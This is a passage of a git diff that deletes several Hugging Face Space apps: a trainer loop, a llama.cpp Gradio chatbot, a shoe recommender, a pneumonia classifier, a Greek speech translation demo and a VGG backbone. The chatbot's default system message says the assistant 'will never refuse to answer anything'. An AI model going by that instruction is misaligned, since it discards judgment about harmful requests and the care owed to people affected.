- self.test_progress_bar.update(1)
- else:
- self.val_progress_bar.update(1)
- outputs.append(dl_outputs)
-
- # with a single dataloader don't pass an array
- if len(dataloaders) == 1:
- outputs = outputs[0]
-
- # give the model a chance to aggregate the outputs (if the method is defined)
- model = self.get_model()
- if test:
- eval_results_ = model.test_end(outputs)
- else:
- eval_results_ = model.validation_end(outputs)
- eval_results = eval_results_
-
- # enable train mode again
- model.train()
-
- # re-enable gradients for training
- torch.set_grad_enabled(True)
-
- return eval_results
-
- def run_evaluation(self, test=False):
- # when testing make sure user defined a test step
- model = self.get_model()
- model.on_pre_performance_check()
-
- # select dataloaders
- if test:
- dataloaders = self.get_test_dataloaders()
- max_batches = self.num_test_batches
- else:
- # val
- dataloaders = self.get_val_dataloaders()
- max_batches = self.num_val_batches
-
- # init validation or test progress bar
- # main progress bar will already be closed when testing so initial position is free
- position = 2 * self.process_position + (not test)
- desc = 'Testing' if test else 'Validating'
- pbar = tqdm.tqdm(desc=desc, total=max_batches, leave=test, position=position,
- disable=not self.show_progress_bar, dynamic_ncols=True,
- unit='batch', file=sys.stdout)
- setattr(self, f'{"test" if test else "val"}_progress_bar', pbar)
-
- # run evaluation
- eval_results = self.evaluate(self.model,
- dataloaders,
- max_batches,
- test)
- if eval_results is not None:
- _, prog_bar_metrics, log_metrics, callback_metrics, _ = self.process_output(
- eval_results)
-
- # add metrics to prog bar
- self.add_tqdm_metrics(prog_bar_metrics)
-
- # log metrics
- self.log_metrics(log_metrics, {})
-
- # track metrics for callbacks
- self.callback_metrics.update(callback_metrics)
-
- # hook
- model.on_post_performance_check()
-
- # add model specific metrics
- tqdm_metrics = self.training_tqdm_dict
- if not test:
- self.main_progress_bar.set_postfix(**tqdm_metrics)
-
- # close progress bar
- if test:
- self.test_progress_bar.close()
- else:
- self.val_progress_bar.close()
-
- # model checkpointing
- if self.proc_rank == 0 and self.checkpoint_callback is not None and not test:
- self.checkpoint_callback.on_epoch_end(epoch=self.current_epoch,
- logs=self.callback_metrics)
-
- def evaluation_forward(self, model, batch, batch_idx, dataloader_idx, test=False):
- # make dataloader_idx arg in validation_step optional
- args = [batch, batch_idx]
-
- if test and len(self.get_test_dataloaders()) > 1:
- args.append(dataloader_idx)
-
- elif not test and len(self.get_val_dataloaders()) > 1:
- args.append(dataloader_idx)
-
- # handle DP, DDP forward
- if self.use_ddp or self.use_dp:
- output = model(*args)
- return output
-
- # single GPU
- if self.single_gpu:
- # for single GPU put inputs on gpu manually
- root_gpu = 0
- if isinstance(self.data_parallel_device_ids, list):
- root_gpu = self.data_parallel_device_ids[0]
- batch = self.transfer_batch_to_gpu(batch, root_gpu)
- args[0] = batch
-
- # CPU
- if test:
- output = model.test_step(*args)
- else:
- output = model.validation_step(*args)
-
- return output
-
- def train(self):
- model = self.get_model()
- # run all epochs
- for epoch in range(self.current_epoch, 1000000):
- # set seed for distributed sampler (enables shuffling for each epoch)
- if self.use_ddp and hasattr(self.get_train_dataloader().sampler, 'set_epoch'):
- self.get_train_dataloader().sampler.set_epoch(epoch)
-
- # get model
- model = self.get_model()
-
- # update training progress in trainer and model
- model.current_epoch = epoch
- self.current_epoch = epoch
-
- total_val_batches = 0
- if not self.disable_validation:
- # val can be checked multiple times in epoch
- is_val_epoch = (self.current_epoch + 1) % self.check_val_every_n_epoch == 0
- val_checks_per_epoch = self.num_training_batches // self.val_check_batch
- val_checks_per_epoch = val_checks_per_epoch if is_val_epoch else 0
- total_val_batches = self.num_val_batches * val_checks_per_epoch
-
- # total batches includes multiple val checks
- self.total_batches = self.num_training_batches + total_val_batches
- self.batch_loss_value = 0 # accumulated grads
-
- if self.is_iterable_train_dataloader:
- # for iterable train loader, the progress bar never ends
- num_iterations = None
- else:
- num_iterations = self.total_batches
-
- # reset progress bar
- # .reset() doesn't work on disabled progress bar so we should check
- desc = f'Epoch {epoch + 1}' if not self.is_iterable_train_dataloader else ''
- self.main_progress_bar.set_description(desc)
-
- # update gradient accumulation according to the accumulation_scheduler
- self.accumulation_scheduler.on_epoch_begin(epoch, self)
-
- # -----------------
- # RUN TRAINING EPOCH
- # -----------------
- self.run_training_epoch()
-
- # update LR schedulers
- if self.lr_schedulers is not None:
- for lr_scheduler in self.lr_schedulers:
- lr_scheduler.step(epoch=self.current_epoch)
-
- self.main_progress_bar.close()
-
- model.on_train_end()
-
- if self.logger is not None:
- self.logger.finalize("success")
-
- def run_training_epoch(self):
- # before epoch hook
- if self.is_function_implemented('on_epoch_start'):
- model = self.get_model()
- model.on_epoch_start()
-
- # run epoch
- for batch_idx, batch in enumerate(self.get_train_dataloader()):
- # stop epoch if we limited the number of training batches
- if batch_idx >= self.num_training_batches:
- break
-
- self.batch_idx = batch_idx
-
- model = self.get_model()
- model.global_step = self.global_step
-
- # ---------------
- # RUN TRAIN STEP
- # ---------------
- output = self.run_training_batch(batch, batch_idx)
- batch_result, grad_norm_dic, batch_step_metrics = output
-
- # when returning -1 from train_step, we end epoch early
- early_stop_epoch = batch_result == -1
-
- # ---------------
- # RUN VAL STEP
- # ---------------
- should_check_val = (
- not self.disable_validation and self.global_step % self.val_check_batch == 0 and not self.first_epoch)
- self.first_epoch = False
-
- if should_check_val:
- self.run_evaluation(test=self.testing)
-
- # when logs should be saved
- should_save_log = (batch_idx + 1) % self.log_save_interval == 0 or early_stop_epoch
- if should_save_log:
- if self.proc_rank == 0 and self.logger is not None:
- self.logger.save()
-
- # when metrics should be logged
- should_log_metrics = batch_idx % self.row_log_interval == 0 or early_stop_epoch
- if should_log_metrics:
- # logs user requested information to logger
- self.log_metrics(batch_step_metrics, grad_norm_dic)
-
- self.global_step += 1
- self.total_batch_idx += 1
-
- # end epoch early
- # stop when the flag is changed or we've gone past the amount
- # requested in the batches
- if early_stop_epoch:
- break
- if self.global_step > self.max_updates:
- print("| Training end..")
- exit()
-
- # epoch end hook
- if self.is_function_implemented('on_epoch_end'):
- model = self.get_model()
- model.on_epoch_end()
-
- def run_training_batch(self, batch, batch_idx):
- # track grad norms
- grad_norm_dic = {}
-
- # track all metrics for callbacks
- all_callback_metrics = []
-
- # track metrics to log
- all_log_metrics = []
-
- if batch is None:
- return 0, grad_norm_dic, {}
-
- # hook
- if self.is_function_implemented('on_batch_start'):
- model_ref = self.get_model()
- response = model_ref.on_batch_start(batch)
-
- if response == -1:
- return -1, grad_norm_dic, {}
-
- splits = [batch]
- self.hiddens = None
- for split_idx, split_batch in enumerate(splits):
- self.split_idx = split_idx
-
- # call training_step once per optimizer
- for opt_idx, optimizer in enumerate(self.optimizers):
- if optimizer is None:
- continue
- # make sure only the gradients of the current optimizer's parameters are calculated
- # in the training step to prevent dangling gradients in multiple-optimizer setup.
- if len(self.optimizers) > 1:
- for param in self.get_model().parameters():
- param.requires_grad = False
- for group in optimizer.param_groups:
- for param in group['params']:
- param.requires_grad = True
-
- # wrap the forward step in a closure so second order methods work
- def optimizer_closure():
- # forward pass
- output = self.training_forward(
- split_batch, batch_idx, opt_idx, self.hiddens)
-
- closure_loss = output[0]
- progress_bar_metrics = output[1]
- log_metrics = output[2]
- callback_metrics = output[3]
- self.hiddens = output[4]
- if closure_loss is None:
- return None
-
- # accumulate loss
- # (if accumulate_grad_batches = 1 no effect)
- closure_loss = closure_loss / self.accumulate_grad_batches
-
- # backward pass
- model_ref = self.get_model()
- if closure_loss.requires_grad:
- model_ref.backward(closure_loss, optimizer)
-
- # track metrics for callbacks
- all_callback_metrics.append(callback_metrics)
-
- # track progress bar metrics
- self.add_tqdm_metrics(progress_bar_metrics)
- all_log_metrics.append(log_metrics)
-
- # call the on_after_backward hook
- if self.is_function_implemented('on_after_backward'):
- model_ref = self.get_model()
- model_ref.on_after_backward()
-
- return closure_loss
-
- # calculate loss
- loss = optimizer_closure()
- if loss is None:
- continue
-
- # nan grads
- if self.print_nan_grads:
- self.print_nan_gradients()
-
- # track total loss for logging (avoid mem leaks)
- self.batch_loss_value += loss.item()
-
- # gradient update with accumulated gradients
- if (self.batch_idx + 1) % self.accumulate_grad_batches == 0:
-
- # track gradient norms when requested
- if batch_idx % self.row_log_interval == 0:
- if self.track_grad_norm > 0:
- model = self.get_model()
- grad_norm_dic = model.grad_norm(
- self.track_grad_norm)
-
- # clip gradients
- self.clip_gradients()
-
- # calls .step(), .zero_grad()
- # override function to modify this behavior
- model = self.get_model()
- model.optimizer_step(self.current_epoch, batch_idx, optimizer, opt_idx)
-
- # calculate running loss for display
- self.running_loss.append(self.batch_loss_value)
- self.batch_loss_value = 0
- self.avg_loss = np.mean(self.running_loss[-100:])
-
- # activate batch end hook
- if self.is_function_implemented('on_batch_end'):
- model = self.get_model()
- model.on_batch_end()
-
- # update progress bar
- self.main_progress_bar.update(1)
- self.main_progress_bar.set_postfix(**self.training_tqdm_dict)
-
- # collapse all metrics into one dict
- all_log_metrics = {k: v for d in all_log_metrics for k, v in d.items()}
-
- # track all metrics for callbacks
- self.callback_metrics.update({k: v for d in all_callback_metrics for k, v in d.items()})
-
- return 0, grad_norm_dic, all_log_metrics
-
- def training_forward(self, batch, batch_idx, opt_idx, hiddens):
- """
- Handle forward for each training case (distributed, single gpu, etc...)
- :param batch:
- :param batch_idx:
- :return:
- """
- # ---------------
- # FORWARD
- # ---------------
- # build the training_step args (opt_idx is passed for multi-optimizer setups)
- args = [batch, batch_idx, opt_idx]
-
- # distributed forward
- if self.use_ddp or self.use_dp:
- output = self.model(*args)
- # single GPU forward
- elif self.single_gpu:
- gpu_id = 0
- if isinstance(self.data_parallel_device_ids, list):
- gpu_id = self.data_parallel_device_ids[0]
- batch = self.transfer_batch_to_gpu(copy.copy(batch), gpu_id)
- args[0] = batch
- output = self.model.training_step(*args)
- # CPU forward
- else:
- output = self.model.training_step(*args)
-
- # allow any mode to define training_end
- model_ref = self.get_model()
- output_ = model_ref.training_end(output)
- if output_ is not None:
- output = output_
-
- # format and reduce outputs accordingly
- output = self.process_output(output, train=True)
-
- return output
-
- # ---------------
- # Utils
- # ---------------
- def is_function_implemented(self, f_name):
- model = self.get_model()
- f_op = getattr(model, f_name, None)
- return callable(f_op)
-
- def _percent_range_check(self, name):
- value = getattr(self, name)
- msg = f"`{name}` must lie in the range [0.0, 1.0], but got {value:.3f}."
- if name == "val_check_interval":
- msg += " If you want to disable validation set `val_percent_check` to 0.0 instead."
-
- if not 0. <= value <= 1.:
- raise ValueError(msg)
diff --git a/spaces/RoversX/Nous-Hermes-Llama-2-7B-GGML/tabbed.py b/spaces/RoversX/Nous-Hermes-Llama-2-7B-GGML/tabbed.py
deleted file mode 100644
index 2e6cb8337a48689eef48835bbc094696d4485c6e..0000000000000000000000000000000000000000
--- a/spaces/RoversX/Nous-Hermes-Llama-2-7B-GGML/tabbed.py
+++ /dev/null
@@ -1,140 +0,0 @@
-import gradio as gr
-import yaml
-from huggingface_hub import hf_hub_download
-from huggingface_hub.utils import LocalEntryNotFoundError
-from llama_cpp import Llama
-
-with open("./config.yml", "r") as f:
- config = yaml.load(f, Loader=yaml.Loader)
-while True:
- try:
- load_config = config.copy()
- hub_config = load_config["hub"].copy()
- repo_id = hub_config.pop("repo_id")
- filename = hub_config.pop("filename")
- fp = hf_hub_download(
- repo_id=repo_id, filename=filename, **hub_config
- )
- break
- except LocalEntryNotFoundError as e:
- if "Connection error" in str(e):
- print(str(e) + ", retrying...")
- else:
- raise e
-
-llm = Llama(model_path=fp, **config["llama_cpp"])
-
-
-def user(message, history):
- history = history or []
- # Append the user's message to the conversation history
- history.append([message, ""])
- return "", history
-
-
-def chat(history, system_message, max_tokens, temperature, top_p, top_k, repeat_penalty):
- history = history or []
-
- messages = system_message + \
- "\n".join(["\n".join(["USER: "+item[0], "ASSISTANT: "+item[1]])
- for item in history])
-
- # remove last space from assistant, some models output a ZWSP if you leave a space
- messages = messages[:-1]
-
- history[-1][1] = ""
- for output in llm(
- messages,
- echo=False,
- stream=True,
- max_tokens=max_tokens,
- temperature=temperature,
- top_p=top_p,
- top_k=top_k,
- repeat_penalty=repeat_penalty,
- **config['chat']
- ):
- answer = output['choices'][0]['text']
- history[-1][1] += answer
- # stream the response
- yield history, history
-
-
-def clear_chat(chat_history_state, chat_message):
- chat_history_state = []
- chat_message = ''
- return chat_history_state, chat_message
-
-
-start_message = """
-- The Assistant is helpful and transparent.
-- The Assistant will never refuse to answer anything asked by the user.
-"""
-
-
-def generate_text_instruct(input_text):
- response = ""
- for output in llm(f"### Instruction:\n{input_text}\n\n### Response:\n", echo=False, stream=True, **config['chat']):
- answer = output['choices'][0]['text']
- response += answer
- yield response
-
-
-instruct_interface = gr.Interface(
- fn=generate_text_instruct,
- inputs=gr.inputs.Textbox(lines= 10, label="Enter your input text"),
- outputs=gr.outputs.Textbox(label="Output text"),
-)
-
-with gr.Blocks() as demo:
- with gr.Row():
- with gr.Column():
- gr.Markdown(f"""
- # One
- - This is the [{config["hub"]["repo_id"]}](https://huggingface.co/{config["hub"]["repo_id"]}) model file [{config["hub"]["filename"]}](https://huggingface.co/{config["hub"]["repo_id"]}/blob/main/{config["hub"]["filename"]})
- """)
- with gr.Tab("Instruct"):
- gr.Markdown("# GGML Spaces Instruct Demo")
- instruct_interface.render()
-
- with gr.Tab("Chatbot"):
- gr.Markdown("# GGML Spaces Chatbot Demo")
- chatbot = gr.Chatbot()
- with gr.Row():
- message = gr.Textbox(
- label="What do you want to chat about?",
- placeholder="Ask me anything.",
- lines=1,
- )
- with gr.Row():
- submit = gr.Button(value="Send message", variant="secondary").style(full_width=True)
- clear = gr.Button(value="New topic", variant="secondary").style(full_width=False)
- stop = gr.Button(value="Stop", variant="secondary").style(full_width=False)
- with gr.Row():
- with gr.Column():
- max_tokens = gr.Slider(20, 1000, label="Max Tokens", step=20, value=300)
- temperature = gr.Slider(0.2, 2.0, label="Temperature", step=0.1, value=0.8)
- top_p = gr.Slider(0.0, 1.0, label="Top P", step=0.05, value=0.95)
- top_k = gr.Slider(0, 100, label="Top K", step=1, value=40)
- repeat_penalty = gr.Slider(0.0, 2.0, label="Repetition Penalty", step=0.1, value=1.1)
-
- system_msg = gr.Textbox(
- start_message, label="System Message", interactive=True, visible=True, placeholder="system prompt, useful for RP", lines=5)
-
- chat_history_state = gr.State()
- clear.click(clear_chat, inputs=[chat_history_state, message], outputs=[chat_history_state, message], queue=False)
- clear.click(lambda: None, None, chatbot, queue=False)
-
- submit_click_event = submit.click(
- fn=user, inputs=[message, chat_history_state], outputs=[message, chat_history_state], queue=True
- ).then(
- fn=chat, inputs=[chat_history_state, system_msg, max_tokens, temperature, top_p, top_k, repeat_penalty], outputs=[chatbot, chat_history_state], queue=True
- )
- message_submit_event = message.submit(
- fn=user, inputs=[message, chat_history_state], outputs=[message, chat_history_state], queue=True
- ).then(
- fn=chat, inputs=[chat_history_state, system_msg, max_tokens, temperature, top_p, top_k, repeat_penalty], outputs=[chatbot, chat_history_state], queue=True
- )
- stop.click(fn=None, inputs=None, outputs=None, cancels=[submit_click_event, message_submit_event], queue=False)
-
-demo.queue(**config["queue"]).launch(debug=True, server_name="0.0.0.0", server_port=7860)
diff --git a/spaces/SNKRWRLD/SNKR_WRLD_Shoe_Picker/app.py b/spaces/SNKRWRLD/SNKR_WRLD_Shoe_Picker/app.py
deleted file mode 100644
index b8e324b9c29780cc194b84219d4782bd519931d7..0000000000000000000000000000000000000000
--- a/spaces/SNKRWRLD/SNKR_WRLD_Shoe_Picker/app.py
+++ /dev/null
@@ -1,172 +0,0 @@
-### ----------------------------- ###
-### libraries ###
-### ----------------------------- ###
-
-import gradio as gr
-import pandas as pd
-import numpy as np
-from sklearn.model_selection import train_test_split
-from sklearn.linear_model import LogisticRegression
-from sklearn import metrics
-
-
-### ------------------------------ ###
-### data transformation ###
-### ------------------------------ ###
-
-# load dataset
-uncleaned_data = pd.read_csv('data.csv')
-
-# remove timestamp from dataset (always first column)
-uncleaned_data = uncleaned_data.iloc[: , 1:]
-data = pd.DataFrame()
-
-# keep track of which columns are categorical and what
-# those columns' value mappings are
-# structure: {colname1: {...}, colname2: {...} }
-cat_value_dicts = {}
-final_colname = uncleaned_data.columns[len(uncleaned_data.columns) - 1]
-
-# for each column...
-for (colname, colval) in uncleaned_data.items():
-
- # check if col is already a number; if so, add col directly
- # to new dataframe and skip to next column
- if isinstance(colval.values[0], (np.integer, float)):
- data[colname] = uncleaned_data[colname].copy()
- continue
-
- # structure: {0: "lilac", 1: "blue", ...}
- new_dict = {}
- val = 0 # first index per column
- transformed_col_vals = [] # new numeric datapoints
-
- # if not, for each item in that column...
- for (row, item) in enumerate(colval.values):
-
- # if item is not in this col's dict...
- if item not in new_dict:
- new_dict[item] = val
- val += 1
-
- # then add numerical value to transformed dataframe
- transformed_col_vals.append(new_dict[item])
-
- # reverse dictionary only for final col (0, 1) => (vals)
- if colname == final_colname:
- new_dict = {value : key for (key, value) in new_dict.items()}
-
- cat_value_dicts[colname] = new_dict
- data[colname] = transformed_col_vals
-
-
-### -------------------------------- ###
-### model training ###
-### -------------------------------- ###
-
-# select features and prediction; automatically selects last column as prediction
-cols = len(data.columns)
-num_features = cols - 1
-x = data.iloc[: , :num_features]
-y = data.iloc[: , num_features:]
-
-# split data into training and testing sets
-x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25)
-
-# instantiate the model (using default parameters)
-model = LogisticRegression()
-model.fit(x_train, y_train.values.ravel())
-y_pred = model.predict(x_test)
-
-
-### -------------------------------- ###
-### article generation ###
-### -------------------------------- ###
-# borrow file reading function from reader.py
-
-def get_feat():
- feats = [abs(x) for x in model.coef_[0]]
- max_val = max(feats)
- idx = feats.index(max_val)
- return data.columns[idx]
-
-acc = str(round(metrics.accuracy_score(y_test, y_pred) * 100, 1)) + "%"
-most_imp_feat = get_feat()
-# info = get_article(acc, most_imp_feat)
-
-
-
-### ------------------------------- ###
-### interface creation ###
-### ------------------------------- ###
-
-
-# predictor for generic number of features
-def general_predictor(*args):
- features = []
-
- # transform categorical input
- for colname, arg in zip(data.columns, args):
- if (colname in cat_value_dicts):
- features.append(cat_value_dicts[colname][arg])
- else:
- features.append(arg)
-
- # predict single datapoint
- new_input = [features]
- result = model.predict(new_input)
- return cat_value_dicts[final_colname][result[0]]
-
-# add data labels to replace those lost via star-args
-
-
-block = gr.Blocks()
-
-with open('info.md') as f:
- with block:
- gr.Markdown(f.readline())
- gr.Markdown('Take the quiz to get a personalized recommendation using AI.')
-
- with gr.Row():
- with gr.Box():
- inputls = []
- for colname in data.columns:
- # skip last column
- if colname == final_colname:
- continue
-
- # access categories dict if data is categorical
- # otherwise, just use a number input
- if colname in cat_value_dicts:
- radio_options = list(cat_value_dicts[colname].keys())
- inputls.append(gr.inputs.Dropdown(choices=radio_options, type="value", label=colname))
- else:
- # add numerical input
- inputls.append(gr.inputs.Number(label=colname))
- gr.Markdown("<br />")
-
- submit = gr.Button("Click to see your personalized result!", variant="primary")
- gr.Markdown("<br />")
- output = gr.Textbox(label="Your recommendation:", placeholder="your recommendation will appear here")
-
- submit.click(fn=general_predictor, inputs=inputls, outputs=output)
- gr.Markdown("<br />")
-
- with gr.Row():
- with gr.Box():
- gr.Markdown(f"Accuracy: <br />{acc}")
- with gr.Box():
- gr.Markdown(f"Most important feature: <br />{most_imp_feat}")
-
- gr.Markdown("<br />")
-
- with gr.Box():
- gr.Markdown('''⭐ Note that model accuracy is based on the uploaded data.csv and reflects how well the AI model can give correct recommendations for that dataset. Model accuracy and most important feature can be helpful for understanding how the model works, but should not be considered absolute facts about the real world.''')
-
- with gr.Box():
- with open('info.md') as f:
- f.readline()
- gr.Markdown(f.read())
-
-# show the interface
-block.launch()
\ No newline at end of file
diff --git a/spaces/Sambhavnoobcoder/pneumonia-detector-v1/app.py b/spaces/Sambhavnoobcoder/pneumonia-detector-v1/app.py
deleted file mode 100644
index 0535e95cf95257d6ea79d88f90bc190220ec6420..0000000000000000000000000000000000000000
--- a/spaces/Sambhavnoobcoder/pneumonia-detector-v1/app.py
+++ /dev/null
@@ -1,17 +0,0 @@
-from tensorflow.keras.models import load_model
-import numpy as np
-import cv2
-
-model = load_model('model-3.h5')
-
-def predict_from_img(img):
- img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
- img = img/255.0
- img = np.expand_dims(img,axis = 0)
- output = model.predict(img)[0][0]
- return {'NORMAL':float(output),'PNEUMONIA':float(1-output)}
-
-import gradio as gr
-image = gr.inputs.Image(shape=(150,150))
-label = gr.outputs.Label(num_top_classes=2)
-gr.Interface(fn=predict_from_img, inputs=image, outputs=label,title = 'PNEUMONIA-DETECTION').launch()
\ No newline at end of file
diff --git a/spaces/Sandiago21/speech-to-speech-translation-greek-with-transcription/app.py b/spaces/Sandiago21/speech-to-speech-translation-greek-with-transcription/app.py
deleted file mode 100644
index ae8653eea83b098210fd332bd5940391389109b1..0000000000000000000000000000000000000000
--- a/spaces/Sandiago21/speech-to-speech-translation-greek-with-transcription/app.py
+++ /dev/null
@@ -1,218 +0,0 @@
-import gradio as gr
-import numpy as np
-import torch
-from datasets import load_dataset
-from transformers import SpeechT5ForTextToSpeech, SpeechT5HifiGan, SpeechT5Processor, pipeline
-
-
-device = "cuda:0" if torch.cuda.is_available() else "cpu"
-
-# load speech translation checkpoint
-asr_pipe = pipeline("automatic-speech-recognition", model="openai/whisper-large-v2", device=device)
-greek_translation_pipe = pipeline("translation", model="Helsinki-NLP/opus-mt-en-el")
-
-# load text-to-speech checkpoint and speaker embeddings
-model_id = "microsoft/speecht5_tts" # update with your model id
-# pipe = pipeline("automatic-speech-recognition", model=model_id)
-model = SpeechT5ForTextToSpeech.from_pretrained(model_id)
-vocoder = SpeechT5HifiGan.from_pretrained("microsoft/speecht5_hifigan")
-embeddings_dataset = load_dataset("Matthijs/cmu-arctic-xvectors", split="validation")
-speaker_embeddings = torch.tensor(embeddings_dataset[7440]["xvector"]).unsqueeze(0)
-
-processor = SpeechT5Processor.from_pretrained(model_id)
-
-model_id_greek = "Sandiago21/speecht5_finetuned_google_fleurs_greek"
-model_greek = SpeechT5ForTextToSpeech.from_pretrained(model_id_greek)
-processor_greek = SpeechT5Processor.from_pretrained(model_id_greek)
-
-replacements = [
- ("á", "a"),
- ("â", "a"),
- ("ã", "a"),
- ("í", "i"),
- ("á", "a"),
- ("í", "i"),
- ("ñ", "n"),
- ("ó", "o"),
- ("ú", "u"),
- ("ü", "u"),
- ("á", "a"),
- ("ç", "c"),
- ("è", "e"),
- ("ì", "i"),
- ("í", "i"),
- ("ò", "o"),
- ("ó", "o"),
- ("ù", "u"),
- ("ú", "u"),
- ("š", "s"),
- ("ï", "i"),
- ("à", "a"),
- ("â", "a"),
- ("ç", "c"),
- ("è", "e"),
- ("ë", "e"),
- ("î", "i"),
- ("ï", "i"),
- ("ô", "o"),
- ("ù", "u"),
- ("û", "u"),
- ("ü", "u"),
- ("ου", "u"),
- ("αυ", "af"),
- ("ευ", "ef"),
- ("ει", "i"),
- ("οι", "i"),
- ("αι", "e"),
- ("ού", "u"),
- ("εί", "i"),
- ("οί", "i"),
- ("αί", "e"),
- ("Ά", "A"),
- ("Έ", "E"),
- ("Ή", "H"),
- ("Ί", "I"),
- ("Ό", "O"),
- ("Ύ", "Y"),
- ("Ώ", "O"),
- ("ΐ", "i"),
- ("Α", "A"),
- ("Β", "B"),
- ("Γ", "G"),
- ("Δ", "L"),
- ("Ε", "Ε"),
- ("Ζ", "Z"),
- ("Η", "I"),
- ("Θ", "Th"),
- ("Ι", "I"),
- ("Κ", "K"),
- ("Λ", "L"),
- ("Μ", "M"),
- ("Ν", "N"),
- ("Ξ", "Ks"),
- ("Ο", "O"),
- ("Π", "P"),
- ("Ρ", "R"),
- ("Σ", "S"),
- ("Τ", "T"),
- ("Υ", "Y"),
- ("Φ", "F"),
- ("Χ", "X"),
- ("Ω", "O"),
- ("ά", "a"),
- ("έ", "e"),
- ("ή", "i"),
- ("ί", "i"),
- ("α", "a"),
- ("β", "v"),
- ("γ", "g"),
- ("δ", "d"),
- ("ε", "e"),
- ("ζ", "z"),
- ("η", "i"),
- ("θ", "th"),
- ("ι", "i"),
- ("κ", "k"),
- ("λ", "l"),
- ("μ", "m"),
- ("ν", "n"),
- ("ξ", "ks"),
- ("ο", "o"),
- ("π", "p"),
- ("ρ", "r"),
- ("ς", "s"),
- ("σ", "s"),
- ("τ", "t"),
- ("υ", "i"),
- ("φ", "f"),
- ("χ", "h"),
- ("ψ", "ps"),
- ("ω", "o"),
- ("ϊ", "i"),
- ("ϋ", "i"),
- ("ό", "o"),
- ("ύ", "i"),
- ("ώ", "o"),
- ("í", "i"),
- ("õ", "o"),
- ("Ε", "E"),
- ("Ψ", "Ps"),
-]
-
-def cleanup_text(text):
- for src, dst in replacements:
- text = text.replace(src, dst)
- return text
-
-
-def synthesize_speech(text):
- text = cleanup_text(text)
- inputs = processor(text=text, return_tensors="pt")
- speech = model.generate_speech(inputs["input_ids"].to(device), speaker_embeddings.to(device), vocoder=vocoder)
-
- return gr.Audio.update(value=(16000, speech.cpu().numpy()))
-
-
-def translate_to_english(audio):
- outputs = asr_pipe(audio, max_new_tokens=256, generate_kwargs={"task": "translate", "language": "english"})
- return outputs["text"]
-
-
-def synthesise_from_english(text):
- text = cleanup_text(text)
- inputs = processor(text=text, return_tensors="pt")
- speech = model.generate_speech(inputs["input_ids"].to(device), speaker_embeddings.to(device), vocoder=vocoder)
- return speech.cpu().numpy()
-
-
-def translate_from_english_to_greek(text):
- return greek_translation_pipe(text)[0]["translation_text"]
-
-
-def synthesise_from_greek(text):
- text = cleanup_text(text)
- inputs = processor_greek(text=text, return_tensors="pt")
- speech = model_greek.generate_speech(inputs["input_ids"].to(device), speaker_embeddings.to(device), vocoder=vocoder)
- return speech.cpu()
-
-
-def speech_to_speech_translation(audio):
- translated_text = translate_to_english(audio)
- translated_text = translate_from_english_to_greek(translated_text)
-# synthesised_speech = synthesise_from_english(translated_text)
-# translated_text = translate_from_english_to_greek(synthesised_speech)
- synthesised_speech = synthesise_from_greek(translated_text)
- synthesised_speech = (synthesised_speech.numpy() * 32767).astype(np.int16)
- return ((16000, synthesised_speech), translated_text)
-
-
-title = "Cascaded STST"
-description = """
-Demo for cascaded speech-to-speech translation (STST), mapping from source speech in any language to target speech in Greek. Demo uses OpenAI's [Whisper Large v2](https://huggingface.co/openai/whisper-large-v2) model for speech translation, and [Sandiago21/speecht5_finetuned_google_fleurs_greek](https://huggingface.co/Sandiago21/speecht5_finetuned_google_fleurs_greek) checkpoint for text-to-speech, which is based on Microsoft's
-[SpeechT5 TTS](https://huggingface.co/microsoft/speecht5_tts) model for text-to-speech, fine-tuned on a Greek audio dataset.
-
-"""
-
-demo = gr.Blocks()
-
-mic_translate = gr.Interface(
- fn=speech_to_speech_translation,
- inputs=gr.Audio(source="microphone", type="filepath"),
- outputs=[gr.Audio(label="Generated Speech", type="numpy"), gr.outputs.Textbox()],
- title=title,
- description=description,
-)
-
-file_translate = gr.Interface(
- fn=speech_to_speech_translation,
- inputs=gr.Audio(source="upload", type="filepath"),
- outputs=[gr.Audio(label="Generated Speech", type="numpy"), gr.outputs.Textbox()],
- examples=[["./example.wav"]],
- title=title,
- description=description,
-)
-
-with demo:
- gr.TabbedInterface([mic_translate, file_translate], ["Microphone", "Audio File"])
-
-demo.launch()
diff --git a/spaces/SankarSrin/image-matting-app/ppmatting/models/backbone/vgg.py b/spaces/SankarSrin/image-matting-app/ppmatting/models/backbone/vgg.py
deleted file mode 100644
index 64b529bf0c3e25cb82ea4b4c31bec9ef30d2da59..0000000000000000000000000000000000000000
--- a/spaces/SankarSrin/image-matting-app/ppmatting/models/backbone/vgg.py
+++ /dev/null
@@ -1,166 +0,0 @@
-# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-import paddle
-from paddle import ParamAttr
-import paddle.nn as nn
-import paddle.nn.functional as F
-from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
-from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
-
-from paddleseg.cvlibs import manager
-from paddleseg.utils import utils
-
-
-class ConvBlock(nn.Layer):
- def __init__(self, input_channels, output_channels, groups, name=None):
- super(ConvBlock, self).__init__()
-
- self.groups = groups
- self._conv_1 = Conv2D(
- in_channels=input_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "1_weights"),
- bias_attr=False)
- if groups == 2 or groups == 3 or groups == 4:
- self._conv_2 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "2_weights"),
- bias_attr=False)
- if groups == 3 or groups == 4:
- self._conv_3 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "3_weights"),
- bias_attr=False)
- if groups == 4:
- self._conv_4 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "4_weights"),
- bias_attr=False)
-
- self._pool = MaxPool2D(
- kernel_size=2, stride=2, padding=0, return_mask=True)
-
- def forward(self, inputs):
- x = self._conv_1(inputs)
- x = F.relu(x)
- if self.groups == 2 or self.groups == 3 or self.groups == 4:
- x = self._conv_2(x)
- x = F.relu(x)
